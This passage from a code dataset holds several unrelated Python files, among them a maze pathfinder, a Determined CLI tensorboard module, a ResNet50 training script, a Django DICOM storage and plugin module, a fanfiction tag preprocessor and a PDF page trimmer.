if sp[i].x==sp[len(sp)-1].x and sp[i].y==sp[len(sp)-1].y and i!=len(sp)-1:\r\n #print(\"conditions\",sp[len(sp)-1].x,\" \",sp[len(sp)-1].y)\r\n finch=1\r\n else:\r\n for j in range(0,row):\r\n for k in range (0,col):\r\n if j==sp[i].x and k==sp[i].y:\r\n totalc=totalc+1\r\n maze[j][k]=\"5\"\r\n i=i-1\r\n pathindic=1\r\n # endpath=0\r\n pathcounter=1\r\n pathlength=0\r\n pc=0\r\n sp.reverse()\r\n condition=0\r\n final_path=[]\r\n a=[]\r\n a.append(0)\r\n print(\"Optimal Path\")\r\n for i in range (0,len(sp)):\r\n if (sp[i].x==exit_node.x+1 and sp[i].y==exit_node.y) or (sp[i].x==exit_node.x-1 and sp[i].y==exit_node.y) or (sp[i].x==exit_node.x and sp[i].y==exit_node.y+1) or (sp[i].x==exit_node.x+1 and sp[i].y==exit_node.y-1):\r\n print(\"X=\",sp[i].x,\"Y=\",sp[i].y)\r\n print(\"X=\",exit_node.x,\"Y=\",exit_node.y)\r\n print(\"Path length including start and end nodes:\",pathlength+2)\r\n pathlength=0\r\n if i!=len(sp)-1:\r\n print(\"Alternate Path \",pathcounter)\r\n pathcounter=pathcounter+1\r\n else:\r\n print(\"X=\",sp[i].x,\"Y=\",sp[i].y)\r\n pathlength=pathlength+1\r\n t1=t.time()\r\n total=t1-t0\r\n print(\"Time for execution:\",total) \r\n draw_canvas(canvas,maze)\r\n \r\n root.mainloop()\r\n \r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"ANA_star_and_A_star/ANA_8neighbor.py","file_name":"ANA_8neighbor.py","file_ext":"py","file_size_in_byte":11250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"146219157","text":"# -*- coding: UTF-8 -*-\nimport requests\nfrom bs4 import BeautifulSoup\n\nclass idImageSuperLink:\n def identifyFun(self,content):\n try:\n r = requests.get(\"https://image.baidu.com/n/pc_search?queryImageUrl=\" + content + \"&uptype=urlsearch\" , timeout = 6)\n r.raise_for_status()\n\n soup = BeautifulSoup(r.text)\n dataName = soup.find(class_=\"guess-newbaike-profession\")\n if dataName != None:\n menstr = \"你要找的是不是\" + dataName.text + \"?\"\n else:\n htmlstr = r.text\n startNum = htmlstr.find('guessWord')\n htmlstr = htmlstr[startNum:]\n endNum = htmlstr.find('.split')\n htmlstr = htmlstr[13:endNum-1]\n if len(htmlstr) == 0:\n menstr = \"半姬不知道你搜的是什么哦\"\n else:\n menstr = \"你要找的是不是\" + htmlstr + \"?\"\n except:\n print(\"error2\")\n menstr = \"报错了\"\n return menstr\n\n def identifyIf(self,content):\n if content.find('识图:') >=0:\n return True\n else:\n return False\n\n def identifyImage(self,content):\n content = content.strip('识图:')\n content = content.strip(' ')\n try:\n r = requests.get(content)\n if r.status_code != 200:\n menstr = \"需要图片的链接哦\"\n else:\n menstr = self.identifyFun(content)\n except:\n print(\"error\")\n menstr = \"报错了\"\n return menstr","sub_path":"other_module/idImage.py","file_name":"idImage.py","file_ext":"py","file_size_in_byte":1626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"361292131","text":"import sys\nfrom argparse import ONE_OR_MORE, FileType, Namespace\nfrom collections import namedtuple\nfrom typing import Any, Dict, List\n\nfrom termcolor import colored\n\nfrom determined_common import api\nfrom determined_common.api.authentication import authentication_required\nfrom determined_common.check import check_eq\n\nfrom . import render\nfrom .command import Command, parse_config, render_event_stream\nfrom .declarative_argparse import Arg, Cmd\n\nTensorboard = namedtuple(\n \"Tensorboard\",\n [\"id\", \"owner\", \"description\", \"state\", \"experiment_ids\", \"trial_ids\", \"exit_status\"],\n)\n\n\ndef to_tensorboard(command: Command) -> Tensorboard:\n return Tensorboard(\n command.id,\n command.owner[\"username\"],\n command.config[\"description\"],\n command.state,\n command.misc.get(\"experiment_ids\"),\n command.misc.get(\"trial_ids\"),\n command.exit_status,\n )\n\n\n@authentication_required\ndef start_tensorboard(args: Namespace) -> None:\n if args.trial_ids is None and args.experiment_ids is None:\n print(\"Either experiment_ids or trial_ids must be specified.\")\n sys.exit(1)\n\n config = parse_config(args.config_file, None, [], [])\n req_body = {\n \"config\": config,\n \"trial_ids\": args.trial_ids,\n \"experiment_ids\": args.experiment_ids,\n }\n resp = api.post(args.master, \"tensorboard\", body=req_body).json()\n\n if args.detach:\n print(resp[\"id\"])\n return\n\n url = \"tensorboard/{}/events\".format(resp[\"id\"])\n with api.ws(args.master, url) as ws:\n for msg in ws:\n if msg[\"log_event\"] is not None:\n # TensorBoard will print a url by default. The URL is incorrect since\n # TensorBoard is not aware of the master proxy address it is assigned.\n if \"http\" in msg[\"log_event\"]:\n continue\n\n if msg[\"service_ready_event\"]:\n if args.no_browser:\n url = api.make_url(args.master, resp[\"service_address\"])\n else:\n url = api.open(args.master, resp[\"service_address\"])\n\n print(colored(\"TensorBoard is running at: {}\".format(url), \"green\"))\n render_event_stream(msg)\n break\n render_event_stream(msg)\n\n\n@authentication_required\ndef open_tensorboard(args: Namespace) -> None:\n resp = api.get(args.master, \"tensorboard/{}\".format(args.tensorboard_id)).json()\n tensorboard = render.unmarshal(Command, resp)\n check_eq(tensorboard.state, \"RUNNING\", \"TensorBoard must be in a running state\")\n api.open(args.master, resp[\"service_address\"])\n\n\n@authentication_required\ndef tail_tensorboard_logs(args: Namespace) -> None:\n url = \"tensorboard/{}/events?follow={}&tail={}\".format(\n args.tensorboard_id, args.follow, args.tail\n )\n with api.ws(args.master, url) as ws:\n for msg in ws:\n render_event_stream(msg)\n\n\n@authentication_required\ndef list_tensorboards(args: Namespace) -> None:\n if args.all:\n params = {} # type: Dict[str, Any]\n else:\n params = {\"user\": api.Authentication.instance().get_session_user()}\n\n commands = [\n render.unmarshal(Command, command)\n for command in api.get(args.master, \"tensorboard\", params=params).json().values()\n ]\n\n if args.quiet:\n for command in commands:\n print(command.id)\n return\n\n render.render_objects(Tensorboard, [to_tensorboard(command) for command in commands])\n\n\n@authentication_required\ndef kill_tensorboard(args: Namespace) -> None:\n for i, tid in enumerate(args.tensorboard_id):\n try:\n api.delete(args.master, \"tensorboard/{}\".format(tid))\n print(colored(\"Killed tensorboard {}\".format(tid), \"green\"))\n except api.errors.APIException as e:\n if not args.force:\n for ignored in args.tensorboard_id[i + 1 :]:\n print(\"Cowardly not killing {}\".format(ignored))\n raise e\n print(colored(\"Skipping: {} ({})\".format(e, type(e).__name__), \"red\"))\n\n\n@authentication_required\ndef tensorboard_config(args: Namespace) -> None:\n res_json = api.get(args.master, \"tensorboard/{}\".format(args.tensorboard_id)).json()\n print(render.format_object_as_yaml(res_json[\"config\"]))\n\n\n# fmt: off\n\nargs_description = [\n Cmd(\"tensorboard\", None, \"manage TensorBoard instances\", [\n Cmd(\"list ls\", list_tensorboards, \"list TensorBoard instances\", [\n Arg(\"-q\", \"--quiet\", action=\"store_true\",\n help=\"only display the IDs\"),\n Arg(\"--all\", \"-a\", action=\"store_true\",\n help=\"show all TensorBoards (including other users')\")\n ], is_default=True),\n Cmd(\"start\", start_tensorboard, \"start new TensorBoard instance\", [\n Arg(\"experiment_ids\", type=int, nargs=\"*\",\n help=\"experiment IDs to load into TensorBoard. At most 100 trials from \"\n \"the specified experiment will be loaded into TensorBoard. If the \"\n \"experiment has more trials, the 100 best-performing trials will \"\n \"be used.\"),\n Arg(\"--config-file\", default=None, type=FileType(\"r\"),\n help=\"command config file (.yaml)\"),\n Arg(\"-t\", \"--trial-ids\", nargs=ONE_OR_MORE, type=int,\n help=\"trial IDs to load into TensorBoard; at most 100 trials are \"\n \"allowed per TensorBoard instance\"),\n Arg(\"--no-browser\", action=\"store_true\",\n help=\"don't open TensorBoard in a browser after startup\"),\n Arg(\"-d\", \"--detach\", action=\"store_true\",\n help=\"run in the background and print the ID\")\n ]),\n Cmd(\"config\", tensorboard_config,\n \"display TensorBoard config\", [\n Arg(\"tensorboard_id\", type=str, help=\"TensorBoard ID\")\n ]),\n Cmd(\"open\", open_tensorboard,\n \"open existing TensorBoard instance\", [\n Arg(\"tensorboard_id\", help=\"TensorBoard ID\")\n ]),\n Cmd(\"logs\", tail_tensorboard_logs, \"fetch TensorBoard instance logs\", [\n Arg(\"tensorboard_id\", help=\"TensorBoard ID\"),\n Arg(\"-f\", \"--follow\", action=\"store_true\",\n help=\"follow the logs of a TensorBoard instance, \"\n \"similar to tail -f\"),\n Arg(\"--tail\", type=int, default=200,\n help=\"number of lines to show, counting from the end \"\n \"of the log\")\n ]),\n Cmd(\"kill\", kill_tensorboard, \"kill TensorBoard instance\", [\n Arg(\"tensorboard_id\", help=\"TensorBoard ID\", nargs=ONE_OR_MORE),\n Arg(\"-f\", \"--force\", action=\"store_true\", help=\"ignore errors\"),\n ]),\n ])\n] # type: List[Any]\n\n# fmt: on\n","sub_path":"cli/determined_cli/tensorboard.py","file_name":"tensorboard.py","file_ext":"py","file_size_in_byte":6854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"395976580","text":"#%%\nimport tensorflow as tf\nphysical_devices = tf.config.experimental.list_physical_devices('GPU')\ntf.config.experimental.set_memory_growth(physical_devices[0], True)\n\nfrom tensorflow.keras.applications.resnet50 import ResNet50\nfrom tensorflow.keras.layers import Dense\nfrom tensorflow.keras.models import Model\n\nimport numpy as np\nimport splitfolders\n\nfrom helper import Helper\n\n#%% Setup\n\nDATA_DIR_PATH = \"datasets/main\" # Where the dataset is located.\nOUTPUT_DIR = \"datasets/split_images\" # Where to save the trian, val, and test sets.\n\nSEED = 22\n\nTRAIN_R = 0.7 # Train ratio\nVAL_R = 0.2\nTEST_R = 0.1\n\n\nEPOCHS = 200\nMODEL_NAME = \"vtc_final_model\"\n\nBATCH_SIZE = 32\nIMG_SHAPE = (224, 224, 3)\n\n\n# Data augmentation\nD_AUG = True\nROTATION = 10\nWIDTH_SHIFT = 0.2\nHEIGHT_SHIFT = 0.2\nBRIGHTNESS = (0.2, 1.4)\nSHEAR = 0.2\nZOOM = 0.3\nHORI_FLIP = True\n\n\n# To split the dataset into train, val, and test sets.\nsplitfolders.ratio(DATA_DIR_PATH, OUTPUT_DIR, seed=SEED, ratio=(TRAIN_R, VAL_R, TEST_R))\n\ntrain_data_dir = f\"{OUTPUT_DIR}/train\"\nval_data_dir = f\"{OUTPUT_DIR}/val\"\ntest_data_dir = f\"{OUTPUT_DIR}/test\"\n\n\nhelper = Helper()\n\ntrain_gen, val_gen, test_gen = helper.get_resnet_gens(train_data_dir,\n val_data_dir,\n test_data_dir,\n target_size=(IMG_SHAPE[0], IMG_SHAPE[1]),\n batch_size=BATCH_SIZE,\n data_aug=D_AUG,\n rotation=ROTATION,\n width_shift=WIDTH_SHIFT,\n height_shift=HEIGHT_SHIFT,\n brightness=BRIGHTNESS,\n shear=SHEAR,\n zoom=ZOOM,\n hori_flip=HORI_FLIP\n )\n\n\n#%% Creating the model\n\nresnet_model = ResNet50(include_top=False, weights=\"imagenet\", input_shape=IMG_SHAPE, pooling=\"avg\")\n\n# Adding final layers at the end of the model.\nx = resnet_model.output\nx = Dense(32, activation=\"relu\")(x)\n\noutput = Dense(train_gen.num_classes, activation=\"softmax\")(x)\nmodel = Model(inputs=resnet_model.input, outputs=output)\n\n# Freezing ResNet the layers.\nfor layer in resnet_model.layers:\n layer.trainable = False\n \nmodel.compile(\n optimizer=\"adam\",\n loss=\"categorical_crossentropy\",\n metrics=[\"acc\"])\n\nmodel.summary()\n\n#%% Model training\n\nhistory = model.fit(train_gen,\n validation_data=val_gen,\n epochs=EPOCHS)\n\n#%% Test set evaluation\n\nprint(\"\\nTest evaluation:\")\nmodel.evaluate(test_gen)\n\n\n#%% Saving the model\n\nprint(\"\\nSaving model and history...\")\n\nmodel.save(f\"saved_models/{MODEL_NAME}.h5\")\n \nhistory_array = np.array([history.history[\"loss\"],\n history.history[\"acc\"],\n history.history[\"val_loss\"],\n history.history[\"val_acc\"]])\n\nwith open(f\"saved_models/{MODEL_NAME}.npy\", \"wb\") as file:\n np.save(file, history_array)\n \nprint(\"Model and history saved\")\nprint(\"Done\")\n","sub_path":"vtc/VTC_ResNet_training.py","file_name":"VTC_ResNet_training.py","file_ext":"py","file_size_in_byte":3393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"54789405","text":"import os\nfrom tqdm import tqdm\n\nroot_path = '/data3/alexhu/Datasets/AUTSL_Upper/jpg_video/'\nsplit_path = os.listdir(root_path)\nframes = []\n\nfor i in tqdm(range(len(split_path))):\n if split_path[i] != 'val':\n continue\n real_split_path = os.path.join(root_path, split_path[i])\n video_path = os.listdir(real_split_path)\n for j in range(len(video_path)):\n real_video_path = os.path.join(real_split_path, video_path[j])\n frame_path = sorted(os.listdir(real_video_path))\n frames.append(len(frame_path))\n if len(frame_path) < 10:\n print(split_path[i], video_path[j], len(frame_path))\n\nprint('Avg', sum(frames) / float(len(frames)))\nprint('Max', max(frames), 'Min', min(frames))\n","sub_path":"data_arrange/Stage1_Cal_n_frames.py","file_name":"Stage1_Cal_n_frames.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"323765006","text":"import sys\nimport collections\n\ninput = sys.stdin.readline\n\nN, M = map(int, input().split())\ninDegree = [0 for _ in range(N + 1)]\ndp = [0 for _ in range(N + 1)]\n\ngraph = collections.defaultdict(list)\nfor _ in range(M):\n A, B = map(int, input().split())\n graph[A].append(B)\n inDegree[B] += 1\n\nqueue = collections.deque()\nfor i in range(1, N + 1):\n if inDegree[i] == 0:\n queue.append(i)\n dp[i] = 1\n\nwhile queue:\n node = queue.popleft()\n for i in graph[node]:\n inDegree[i] -= 1\n dp[i] = max(dp[node] + 1, dp[i])\n if inDegree[i] == 0:\n queue.append(i)\n\nprint(*dp[1:])\n","sub_path":"A-알고리즘 분류/위상정렬/14567_선수과목 (Prerequisite).py","file_name":"14567_선수과목 (Prerequisite).py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"305209510","text":"# -*- coding:utf-8 -*-\nimport pytest\n\n\ndef _getTarget():\n from miniconfig import ConfiguratorCore\n return ConfiguratorCore\n\n\n@pytest.mark.parametrize(\"current_module, symbol_string, import_symbol\", [\n (\"foo.bar.boo\", \"moo\", \"moo\"),\n (\"foo.bar.boo\", \"moo.moo\", \"moo.moo\"),\n (\"foo.bar.boo\", \".moo\", \"foo.bar.moo\"),\n (\"foo.bar.boo\", \"..moo\", \"foo.moo\"),\n (\"foo.bar.boo\", \".\", \"foo.bar.boo\"),\n (\"foo.bar.boo\", \"..\", \"foo.bar\"),\n])\ndef test_build_import_symbol_string(current_module, symbol_string, import_symbol):\n class module:\n pass\n config = _getTarget()(module=module())\n config.module.__name__ = current_module\n assert config.build_import_symbol_string(symbol_string) == import_symbol\n\n\ndef test_include__function():\n status = [False]\n\n def includeme(config):\n status[0] = True\n\n config = _getTarget()()\n config.include(includeme)\n assert status[0] is True\n\n\ndef test_include__module():\n import imp\n import sys\n\n status = [False]\n\n def includeme(config):\n status[0] = True\n\n module = imp.new_module(\"miniconfig.foo\")\n module.includeme = includeme\n sys.modules[\"miniconfig.foo\"] = module\n\n config = _getTarget()()\n config.include(\"miniconfig.foo\")\n assert status[0] is True\n\n\ndef test_include__module_with_functioname():\n import imp\n import sys\n\n status = [False]\n\n def includeme(config):\n status[0] = True\n\n module = imp.new_module(\"miniconfig.boo\")\n module.myincludeme = includeme\n sys.modules[\"miniconfig.boo\"] = module\n\n config = _getTarget()()\n config.include(\"miniconfig.boo:myincludeme\")\n assert status[0] is True\n","sub_path":"miniconfig/tests/test_include.py","file_name":"test_include.py","file_ext":"py","file_size_in_byte":1660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"195824640","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n# Complete the plusMinus function below.\ndef plusMinus(arr):\n pos = []\n neg = []\n zero = []\n\n for i in arr:\n if i > 0:\n pos.append(i)\n elif i < 0:\n neg.append(i)\n else:\n zero.append(i)\n \n pos_dec = (len(pos) / len(arr))\n neg_dec = (len(neg) / len(arr))\n zero_dec = (len(zero) / len(arr))\n\n print(round(pos_dec, 6))\n print(round(neg_dec, 6))\n print(round(zero_dec, 6))\n\nif __name__ == '__main__':\n n = int(input())\n\n arr = list(map(int, input().rstrip().split()))\n\n plusMinus(arr)\n","sub_path":"HackerRank/plus-minus.py","file_name":"plus-minus.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"415015252","text":"import importlib\nimport json\nfrom json import JSONEncoder\nfrom zipfile import ZipFile\n\nimport sys\n\nimport numpy as np\nfrom PIL import Image\nfrom io import BytesIO\nfrom pydicom import Dataset, Sequence\nfrom pydicom import read_file\nfrom pydicom.dataelem import PersonName\nfrom pydicom.multival import MultiValue\nfrom pydicom.valuerep import DA, DT, TM, DSfloat, DSdecimal, IS\n\nfrom apps.core.models import *\n\n\nclass DicomSaver:\n\n @classmethod\n def save(cls, fp):\n ds: Dataset = read_file(fp)\n if isinstance(fp, str):\n fp = open(fp, 'rb')\n if Instance.objects.filter(sop_instance_uid=ds.SOPInstanceUID).exists():\n instance = Instance.objects.get(sop_instance_uid=ds.SOPInstanceUID)\n instance.image.delete()\n instance.image.save('', fp)\n return instance\n elif Series.objects.filter(series_instance_uid=ds.SeriesInstanceUID).exists():\n series = Series.objects.get(series_instance_uid=ds.SeriesInstanceUID)\n instance = Instance.from_dataset(ds=ds)\n instance.series = series\n instance.image.save('', fp)\n instance.save()\n fp.close()\n return instance\n elif Study.objects.filter(study_instance_uid=ds.StudyInstanceUID).exists():\n study = Study.objects.get(study_instance_uid=ds.StudyInstanceUID)\n series = Series.from_dataset(ds=ds)\n series.study = study\n series.save()\n instance = Instance.from_dataset(ds=ds)\n instance.series = series\n instance.image.save('', fp)\n instance.save()\n fp.close()\n return instance\n\n if ds.PatientID is None or ds.PatientID == '':\n patient = Patient.from_dataset(ds=ds)\n patient.save()\n study = Study.from_dataset(ds=ds)\n study.patient = patient\n study.save()\n series = Series.from_dataset(ds=ds)\n series.study = study\n series.save()\n instance = Instance.from_dataset(ds=ds)\n instance.series = series\n instance.image.save('', fp)\n instance.save()\n fp.close()\n return instance\n elif Patient.objects.filter(patient_id=ds.PatientID):\n patient = Patient.objects.get(patient_id=ds.PatientID)\n study = Study.from_dataset(ds=ds)\n study.patient = patient\n study.save()\n series = Series.from_dataset(ds=ds)\n series.study = study\n series.save()\n instance = Instance.from_dataset(ds=ds)\n instance.series = series\n instance.image.save('', fp)\n instance.save()\n fp.close()\n return instance\n else:\n patient = Patient.from_dataset(ds=ds)\n patient.save()\n study = Study.from_dataset(ds=ds)\n study.patient = patient\n study.save()\n series = Series.from_dataset(ds=ds)\n series.study = study\n series.save()\n instance = Instance.from_dataset(ds=ds)\n instance.series = series\n instance.image.save('', fp)\n instance.save()\n fp.close()\n return instance\n\n\nclass DicomProcessor:\n\n @staticmethod\n def process(instance: Instance, plugin: Plugin, **params):\n ds = read_file(instance.image)\n plugin_path = plugin.plugin.path\n sys.path.append(plugin_path)\n importlib.invalidate_caches()\n with ZipFile(plugin.plugin) as zip_file:\n module_name = zip_file.filelist[0].filename\n module_name = module_name.replace('/', '').replace('\\\\', '')\n plugin_module = importlib.import_module(module_name)\n importlib.reload(plugin_module)\n plugin_processor = plugin_module.Plugin()\n plugin_processor.init()\n result = plugin_processor.process(ds, **params)\n plugin_processor.destroy()\n sys.path.remove(plugin_path)\n return result\n\n\nclass PluginSaver:\n\n @staticmethod\n def save(plugin: Plugin = None, fp=None):\n if plugin is None:\n plugin = Plugin()\n if isinstance(fp, str):\n fp = open(fp, 'rb')\n with ZipFile(fp) as plugin_archive:\n archive_name = plugin_archive.filelist[0].filename\n meta = plugin_archive.read(os.path.join(archive_name, 'META.json'))\n plugin_meta = json.loads(meta)\n plugin.name = plugin_meta['name']\n plugin.author = plugin_meta['author']\n plugin.version = plugin_meta['version']\n plugin.info = plugin_meta['info']\n plugin.docs = plugin_meta['docs']\n plugin.params = plugin_meta.get('params', None)\n plugin.result = plugin_meta['result']\n plugin.tags = plugin_meta.get('tags', None)\n plugin.modalities = plugin_meta.get('modalities', None)\n plugin.plugin.save('', fp)\n plugin.save()\n return plugin\n\n\nclass DicomJsonEncoder(JSONEncoder):\n def default(self, obj):\n if isinstance(obj, PersonName):\n return obj.original_string\n if isinstance(obj, MultiValue) or isinstance(obj, Sequence):\n return_list = []\n for value in obj:\n return_list.append(self.default(value))\n return return_list\n if isinstance(obj, DA):\n return '%d-%02d-%02d' % (obj.year, obj.month, obj.day)\n if isinstance(obj, DT):\n return '%d-%02d-%02d %02d:%02d:%02d' % (obj.year, obj.month, obj.day, obj.hour, obj.minute, obj.second)\n if isinstance(obj, TM):\n return '%02d:%02d:%02d' % (obj.hour, obj.minute, obj.second)\n if isinstance(obj, DSfloat):\n return str(obj)\n if isinstance(obj, DSdecimal):\n return str(obj)\n if isinstance(obj, IS):\n return obj.original_string or str(obj)\n if isinstance(obj, Dataset):\n child_tags = obj.dir()\n return_dict = {}\n for tag in child_tags:\n return_dict[tag] = self.default(obj.data_element(tag).value)\n return return_dict\n return str(obj)\n\n\ndef convert_dicom_to_img(ds: Dataset, img_format='jpeg'):\n return convert_array_to_img(ds.pixel_array, img_format=img_format)\n\n\ndef convert_array_to_img(pixel_array: np.ndarray, img_format='jpeg'):\n orig_shape = pixel_array.shape\n flatten_img = pixel_array.reshape((-1))\n img_min = min(flatten_img)\n img_max = max(flatten_img)\n flatten_img = np.floor_divide(flatten_img, (img_max - img_min + 1) / 256, casting='unsafe')\n img = flatten_img.astype(dtype=np.uint8).reshape(orig_shape)\n img = Image.fromarray(img)\n file = BytesIO()\n img.save(file, format=img_format)\n file.seek(0)\n return file.read()\n","sub_path":"neurdicom/apps/core/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"578894693","text":"import numpy as np\nimport pandas as pd\nimport os\nimport re\nfrom ast import literal_eval\n\ndfs = []\n\n# import all data-frame\nfor filename in os.listdir(\"raw/\") :\n dfs.append(pd.read_csv(\"raw/\" + filename))\n\nkey_word = [\n\"m/m\",\n\"f/m\",\n\"f/f\",\n\"gen\",\n\"multi\",\n\"other\",\n\"happy ending\",\n\"bad ending\",\n\"angst\",\n\"fluff\",\n\"humor\",\n\"smut\",\n\"hurt/comfort\",\n\"time travel\",\n]\n\nsynonyms = {\n\"au\" : \"alternate universe\",\n\"a/b/o\" : \"alpha/beta/omega dynamics\",\n\"abo\" : \"alpha/beta/omega dynamics\",\n\"a/b/o dynamics\" : \"alpha/beta/omega dynamics\",\n\"abo dynamics\" : \"alpha/beta/omega dynamics\",\n}\n\nall_tags_count = {}\ntags_fandoms_counter = {}\n\nfor df in dfs :\n fandom_id = df[\"fandom\"][0]\n #print(fandom_id)\n for i, tags in df[\"tags\"].iteritems() :\n try :\n tags_set = literal_eval(tags)\n except :\n print(tags)\n\n # delete unwanted symbols\n for tag in tags_set :\n tag = re.sub(r\"[\\?\\!\\.\\,]\", \"\", tag)\n\n # extract key_word from sub tags\n # and delete key_word divergent tags\n tags_to_add = set()\n tags_to_remove = set()\n for tag in tags_set :\n found_key = set()\n for key in key_word :\n if tag.find(key) != -1 :\n found_key.add(key)\n if len(found_key) > 1:\n tags_to_remove.add(tag)\n tags_to_add.update(found_key)\n tags_set = tags_set - tags_to_remove\n tags_set = tags_set | tags_to_add\n \n # replace tags with synonyms\n for nym in synonyms.keys() :\n if nym in tags_set :\n tags_set.remove(nym)\n if not synonyms[nym] in tags_set :\n tags_set.add(synonyms[nym])\n \n # save preprocessed tags\n df.at[i, \"tags\"] = str(tags_set)\n \n for tag in tags_set :\n # record tags occurance in fandom\n if tag in tags_fandoms_counter :\n if not fandom_id in tags_fandoms_counter[tag] :\n tags_fandoms_counter[tag].append(fandom_id)\n else :\n tags_fandoms_counter[tag] = list((fandom_id, ))\n \n # record tags total occurance count\n if tag in all_tags_count :\n all_tags_count[tag] += 1\n else :\n all_tags_count[tag] = 1\n\n# decide min_remove_count\ncounts = [all_tags_count[key] for key in all_tags_count]\nmin_remove_count = 50 #20 #int(np.mean(counts) + 1)\n\nprint(\"before tags count:\", len(counts))\nprint(\"max count:\", max(counts))\nprint(\"min_remove_count\", min_remove_count)\n\nprint(\"removing tags\")\ntags_to_remove = set([\"other additional tags to be added\", \"no category\"])\nfor df in dfs :\n fandom_id = df[\"fandom\"][0]\n for i, tags in df[\"tags\"].iteritems() :\n tags_set = literal_eval(tags)\n for tag in tags_set :\n if not tag in tags_to_remove :\n # delete tags that only appear in ONE fandom\n #if len(tags_fandoms_counter[tag]) <= 1 :\n # tags_to_remove.append(tag)\n # delete tags that appear less than min\n if all_tags_count[tag] < min_remove_count :\n tags_to_remove.add(tag)\n # end for tags_set\n # end for df[\"tags\"]\n# end for dfs\n\nprint(\"write preprocessed data\")\nfor df in dfs :\n fandom_id = df[\"fandom\"][0]\n for i, tags in df[\"tags\"].iteritems() :\n tags_set = literal_eval(tags)\n tags_set = tags_set - tags_to_remove\n df.at[i, \"tags\"] = str(tags_set)\n df.to_csv(\"train/\" + fandom_id + \".csv\", index = False)\n\n# replace tag strings to numbers\n# cause it will be easier to code\nprint(\"write tag dictionary\")\ntag_dict = {}\ncount = 0\nfor df in dfs :\n for i, tags in df[\"tags\"].iteritems() :\n tags_set = literal_eval(tags)\n for tag in tags_set :\n if not tag in tag_dict :\n tag_dict[tag] = count\n count += 1\nprint(\"after tags count:\", count)\ndict_df = pd.DataFrame([tag_dict])\ndict_df .to_csv(\"tag_dict.csv\", index = False)\n","sub_path":"preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":4089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"530053942","text":"import os\r\nimport shutil\r\nimport stat\r\nimport sys\r\n\r\nfrom PyPDF2 import PdfFileReader, PdfFileWriter\r\n\r\n\r\ndef deletepagesFromPdf(pdfin, pdfout):\r\n with open(pdfin, 'rb') as f:\r\n pdf_src = PdfFileReader(f)\r\n ipages = pdf_src.getNumPages()\r\n print(\"Original PDF Pages: %d\" % ipages)\r\n skip_page_1 = False\r\n skip_page_last = False\r\n\r\n page2detect_1st = pdf_src.getPage(1)\r\n if page2detect_1st.mediaBox[2] == 960 and page2detect_1st.mediaBox[3] == 540:\r\n skip_page_1 = True\r\n page2detect_2nd = pdf_src.getPage(ipages-1)\r\n print(\"mediabox %s\" % page2detect_2nd.mediaBox)\r\n if page2detect_2nd.mediaBox[2] == 294.24 and page2detect_2nd.mediaBox[3] == 206.4:\r\n skip_page_last = True\r\n\r\n pdf_out = PdfFileWriter()\r\n pdf_out.addPage(pdf_src.getPage(0))\r\n fromindex = 1\r\n toindex = ipages-1\r\n if skip_page_1:\r\n fromindex = 2\r\n if skip_page_last:\r\n toindex = ipages-2\r\n for i in range(fromindex, toindex):\r\n pdf_out.addPage(pdf_src.getPage(i))\r\n with open(pdfout, 'wb') as fo:\r\n pdf_out.write(fo)\r\n\r\n\r\nif __name__ == '__main__':\r\n print('清理当前目录下的PDF文件')\r\n current_dir = os.path.dirname(sys.argv[0])\r\n os.chdir(current_dir)\r\n files = [f for f in os.listdir(current_dir) if (\".pdf\" in f)]\r\n\r\n for f in files:\r\n print(\"处理文件: %s\" % f)\r\n os.chmod(f, stat.S_IWRITE)\r\n try:\r\n if \"2019\" in f:\r\n deletepagesFromPdf(current_dir+\"/\"+f, current_dir+\"/2019/\"+f)\r\n if \"2018\" in f:\r\n deletepagesFromPdf(current_dir+\"/\"+f, current_dir+\"/2018/\"+f)\r\n if \"2017\" in f:\r\n deletepagesFromPdf(current_dir+\"/\"+f, current_dir+\"/2017/\"+f)\r\n if \"2016\" in f:\r\n deletepagesFromPdf(current_dir+\"/\"+f, current_dir+\"/2016/\"+f)\r\n if \"2015\" in f:\r\n deletepagesFromPdf(current_dir+\"/\"+f, current_dir+\"/2015/\"+f)\r\n os.remove(f)\r\n except Exception as e:\r\n print(\"处理失败 %s\" % e)\r\n","sub_path":"5.trimPDF/trimpdf.py","file_name":"trimpdf.py","file_ext":"py","file_size_in_byte":2157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"249101737","text":"from django.urls import path\nfrom .views import FilterMovment, MovementListToday, MovmentListLastWeek, ShowFilterMovment\nfrom django.contrib.auth.decorators import login_required\n\napp_name = 'sensor'\n\nurlpatterns = [\n path('filter', login_required(FilterMovment.as_view()), name='movment-filter'),\n path('list', login_required(MovementListToday.as_view()), name='movment-list'),\n path('lastweeklist', login_required(MovmentListLastWeek.as_view()), name='movment-lastweek-list'),\n path('todaymovment', login_required(ShowFilterMovment.as_view()), name='movment-today'),\n\n\n\n]","sub_path":"sensor/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"639377244","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom __future__ import division\nimport math\nimport numpy as np\nimport scipy as sp\nimport pandas\nimport matplotlib.pyplot as plt\nfrom progressbar import ProgressBar\nfrom scipy.sparse import csr_matrix\nfrom scipy.sparse import linalg as 